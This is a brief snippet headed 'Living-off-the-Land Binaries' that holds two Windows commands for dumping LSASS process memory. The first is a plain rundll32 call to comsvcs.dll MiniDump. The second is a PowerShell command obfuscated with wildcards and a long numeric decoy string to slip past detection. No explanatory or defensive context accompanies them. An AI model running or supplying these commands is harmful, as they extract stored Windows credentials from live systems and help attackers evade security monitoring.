Living-off-the-Land Binaries
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full
&$env:???t??r???\*2\r[t-u]???[k-l]?2* $(gi $env:???t??r???\*2\c?m?[v-w]*l | % {
$_.FullName }), `#-999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999976-decoy $(gps l?a*s).id c:\t??p\dmp.log full;
